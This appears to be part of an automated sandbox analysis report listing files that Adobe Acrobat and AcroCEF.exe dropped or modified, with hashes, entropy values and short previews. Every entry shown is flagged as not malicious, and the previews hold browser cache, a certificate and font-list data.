                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:modified
                          Size (bytes):403
                          Entropy (8bit):4.953858338552356
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4099
                          Entropy (8bit):5.223295371594883
                          Encrypted:false
                          SSDEEP:
                          MD5:0E44A4E81507F8251B9AB4B14F32579E
                          SHA1:C7900FB3412779BF4029C33E82C9FA0382D25460
                          SHA-256:6723CC0611B8C6F715DD3AB150915CFA674B65A975498C59D7A70C40AEF0C51C
                          SHA-512:4B3E66F27BCAD36A5C722257C60BE30C91FA7AF9FEC0877014180697E0639FA0587FC9EC1B95CEE4EE5532448EE9DA0A7A1F6F118228A36FFB6EA302DB87731B
                          Malicious:false
                          Reputation:unknown
                          Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):322
                          Entropy (8bit):5.132761083359997
                          Encrypted:false
                          SSDEEP:
                          MD5:5F21DBA1B437081F2D173717D0120E5C
                          SHA1:672A1C901F2A6D62DB3653FC8C2E4FB7CDD8AC4B
                          SHA-256:A8A70198F01A1C16B5286CB87F2E5D91FE6E0967EA88C26F9552D8BA38941F60
                          SHA-512:8C83D66B283B9FC4C085BCDD8F2CE6D2B296CE9C4ADD911B0AE87B5D28AF7DC2C424C4237DD9CCF88C6D3A4C1D39CA89F8BD7B6E353BD4E06AED621F6AC7B9EC
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.592 1a24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/24-05:03:53.593 1a24 Recovering log #3.2025/03/24-05:03:53.595 1a24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PC bitmap, Windows 3.x format, 164 x -126 x 32, cbSize 82710, bits offset 54
                          Category:dropped
                          Size (bytes):82710
                          Entropy (8bit):1.2272662388702138
                          Encrypted:false
                          SSDEEP:
                          MD5:98F06D06F95BE5918A05315393F18BDF
                          SHA1:37E3683B0A201DB8E67E2341002E04152E145A9C
                          SHA-256:DEBA64094F095542C8C7D2FD63C311A724D644802201B8CF3660B531CFCAE3F2
                          SHA-512:80A45505F1B613B6172A32F52BC8C8AFE3DF8412499AD08116B356B8E081AA70F41A39144F4B91C10A5CD14F26943C34DF48E22A19AE1D0A6FEC63B42B255C01
                          Malicious:false
                          Reputation:unknown
                           Preview:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):57344
                          Entropy (8bit):3.291927920232006
                          Encrypted:false
                          SSDEEP:
                          MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                          SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                          SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                          SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                          Malicious:false
                          Reputation:unknown
                           Preview:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):16928
                          Entropy (8bit):1.21414207559565
                          Encrypted:false
                          SSDEEP:
                          MD5:14930870FC72D8265A9DB3A11A8E0ECC
                          SHA1:022A8E2AA4D8D4CFFE67D30DFAB47310AA8166C9
                          SHA-256:70881AB12C35E37AE1560E7938936B664AD6424BBEE55BEC92682C12A3F39627
                          SHA-512:1897D9128E15378142C00BDF11E7532425DCF7894C39029D8DED7310FC4510EECA34B6F96FE2F72582FDBABB799CDF8E36916DE77551DCCFD9D5AFEC332BC90A
                          Malicious:false
                          Reputation:unknown
                           Preview:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Certificate, Version=3
                          Category:dropped
                          Size (bytes):1391
                          Entropy (8bit):7.705940075877404
                          Encrypted:false
                          SSDEEP:
                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                          Malicious:false
                          Reputation:unknown
                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
                          Size (bytes):73305
                          Entropy (8bit):7.996028107841645
                          Encrypted:true
                          SSDEEP:
                          MD5:83142242E97B8953C386F988AA694E4A
                          SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                          SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                          SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                          Malicious:false
                          Reputation:unknown
                           Preview:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):192
                          Entropy (8bit):2.7790941963225158
                          Encrypted:false
                          SSDEEP:
                          MD5:1C1000193B5BB84DE4B1B056FE95BB1E
                          SHA1:C708E148B826291A96282AA5CFA984F340BC2531
                          SHA-256:6131858839EEEE5D9188943B2AE8BCD66E26915530239B4BD3028ADF098F71E3
                          SHA-512:350C228A6D2840BD94C02CDDD12908EFEDB0F86F2E6CFF8D4979E32A05CFD4B77E3E9D0CF960DC31000DE42801C9DF588B5199415D1DFCB1B6FC82FD5B4366B4
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... ........8n......(....................................................... ..........W.....9..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):330
                          Entropy (8bit):3.189712167018517
                          Encrypted:false
                          SSDEEP:
                          MD5:F531CFB79B6306A3B7D0BC68467DB001
                          SHA1:6F50962BC3636EC5143B669D07115489EFF2765B
                          SHA-256:50CBBED9167F107E9EBAD32FDB08F0DECC627F215931A031CC710F1FD5C9A6D8
                          SHA-512:22CFB5AF637F658A24B907767B864A435ABD7FEFA9714DCFB159DA4DBB0780031F456762FF1FD932429A271BF04C5C7ADD4BF7059BBB0B14737073ADFF8CE7B2
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... ..............(....................................................... ..................(...........Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):185099
                          Entropy (8bit):5.182478651346149
                          Encrypted:false
                          SSDEEP:
                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.381897405086421
                          Encrypted:false
                          SSDEEP:
                          MD5:5000A710FA400BFCEE8BB6B1DF7C40F3
                          SHA1:4B6474E65953091D93F0B35D0A2B12BFB3C0CE4C
                          SHA-256:6F3FAD560D36EA69CFCABCC0C29C5DC08B767E8DE76CD156003D9B9C74118673
                          SHA-512:018053783F2E84A8BAAF0DA22796808CCFEF180BD131AC63B33C914985A67840CEAF978F9440936B3BB81864B7A7DEE41C0BEE0302B8E703388D885D118DE7FD
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.3270070325352785
                          Encrypted:false
                          SSDEEP:
                          MD5:40C1E37D61B6FDDCB7C8CBC2F24A5990
                          SHA1:E128B365396BB1B0F4F95983BD78BAD926DC75E8
                          SHA-256:927FAD2B3CA0ED46D2BAFF7AE1E58E960AD90C824C1810DEBBCAA311EB5B3303
                          SHA-512:A881FEA90CEAF4E0717DC0B6E6DA690921A2B45FE11F6E7B7B95E534A18B57E67EECBBD20A89C213B141D488D315E37605764E35E48A975F31FDA346F577AE73
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.305828107580877
                          Encrypted:false
                          SSDEEP:
                          MD5:EF071A3A30F1B96C229861A7C27C4F0B
                          SHA1:56B370C924F9106ED9FB77DDFF39AD93CFFB2F2A
                          SHA-256:71A32AFD376F1437E99FD76F2AB99DD1EF878EC4067B38D4C6A2708E7DCBDCEE
                          SHA-512:7EE3DC3F0A62EA8ABC03663B6D0AACB2C5EBB7FCE7CF08EB41D7FAEBF13D0DBC17348D62DCC44C799A05944B13E42AED0C9EF64DC0546766F4CF89E296BFC869
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):285
                          Entropy (8bit):5.3709279102754595
                          Encrypted:false
                          SSDEEP:
                          MD5:485D4B509EA79F00F7092D04DB03CE6F
                          SHA1:BFFAA753C355C8433E76AA08E14638C31FB60608
                          SHA-256:BA49BE2BF9AD40A15B3746EA7C5CA70704B3F1BDD3F5CCD0D68FAEFF043CD16F
                          SHA-512:373C1DF6F4513601884A29D987657B5C7B1A0C5A1406CD83BF8A1727805BFA3163341222424AC354BE913FFD5D8FFEF30294A2B1903D20F4C28B7D40E043DA85
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2129
                          Entropy (8bit):5.841203258309073
                          Encrypted:false
                          SSDEEP:
                          MD5:0C0B62C905FD70EEF1EF22B7E1F3791F
                          SHA1:BF836940032C5575DC1C3D0B3D38A342030B9908
                          SHA-256:3F24E029BE478EEF2AC7BEE8D76FBC4A0D32583CE0B8C7DC2A545AC2FCFA55FA
                          SHA-512:93A524C88C0C016F07F950E6414A177CB7C9439F3DA8D5E53961E2C1137D5B04AA28C542E516771D1B79D535AA66FDB2AE1B5E42DDF6C5FACE067DBCC4EE9495
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.316353154177006
                          Encrypted:false
                          SSDEEP:
                          MD5:6203819CA7C328B04FE68E2A08B98265
                          SHA1:FB3BC60C62F7AE20B3D02789C6AEA2439A5013E9
                          SHA-256:BD9996466E1C367B90B0815C4D8B238B1C0AE4EDFA70A8E1D9351FA863F2A676
                          SHA-512:A16A366F3A912B3024E7C895F8C0B81B3C3F7593237FC062ED0B5DD832863AEC3B4594808E37C6FFA8FACBBA7714A49096B8D422A16CAD12B95D9F8A9D3147E4
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.318253770351767
                          Encrypted:false
                          SSDEEP:
                          MD5:20EBC3467DBD11C681F24A061BCA9AAF
                          SHA1:A9EDBE3D2291FC621A54B475F25AF11B8F774A96
                          SHA-256:EC125101EC88314BEE365FE90EC19EF6344AE0AECF86D0031F145F3222676FB4
                          SHA-512:88C0BD76DBD1C67DF2391255DE0887EBD9152F882B852B7FDC669CB5B3CF5B84CFA07E3B803451F9FEF0E8B698D49C77AF38C047C50AECBCEA708EB7805822F9
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2080
                          Entropy (8bit):5.826097793961314
                          Encrypted:false
                          SSDEEP:
                          MD5:879C9BFD9461CA92FD98B2DDF6BC8D66
                          SHA1:BB637DBA819293352C86C5152E5F8504ADFFCBF2
                          SHA-256:24B3F3EED110013121BAB6416AB52F6D17D943C1625A8EC305725A247FA2E6EA
                          SHA-512:07B3B19D001AD97C4B2FEE425E314D3BD10500860E57CCD3843F10939DB55F5954A1F0B57B96E832551EB7D570B1751896F0B8CE7708E0997C028DE4957C928A
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.3415556976688405
                          Encrypted:false
                          SSDEEP:
                          MD5:238A9468B826A9C1149E6BB54A42750D
                          SHA1:308FB6259DD747A870F08619D9A93BA8F387810F
                          SHA-256:117006246F0D4F0B7EF7DD3E19C1359830C9BD71C490F67B9C31774E3DA126F8
                          SHA-512:561F20BBCC884565FD228A9E5A1A514A5A2559E0040132B65B90E6CE744DA9FD95420279F9BB524400A631B9BDC969BF63713B03033489AF4B4361EC60EDAF9B
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.322366357525752
                          Encrypted:false
                          SSDEEP:
                          MD5:7651F6CF74F9A8BE6B0C4F7071ECB7A1
                          SHA1:A83FDC6BD3D015A0E4587391BFFE31BCA49A8A2A
                          SHA-256:545F55F49510871BA3EBE45EB895B59848412862AAB0B828218ACB657D3EBC6E
                          SHA-512:F04087E799C233198629D8F6C74EF27CC541090FC0EC1C75CA3F259A3872F711413DF5B828EBA106D5D787C7A68E9B93E7B955177D53D369912ABBF66A32D50C
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):284
                          Entropy (8bit):5.309391857869186
                          Encrypted:false
                          SSDEEP:
                          MD5:0E45C40C5BBBB475E570D086B76D7B39
                          SHA1:4DAB8E6C0F86E91C00BCE17E3E54115F8C14D3A5
                          SHA-256:95FABCB79009DE2881888BF40E8FB8B77A737410B887DE84FB89EBFA2D18EF03
                          SHA-512:B2CD4ECBE3833A35BDA5B0D303A3911EF690A6896027E7964C30488D781F45B3DB1BA36B2FDB168C7066AF1FE0583B57C01D56D04B8CA3F85DB490D0B7093E03
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):291
                          Entropy (8bit):5.305759734529335
                          Encrypted:false
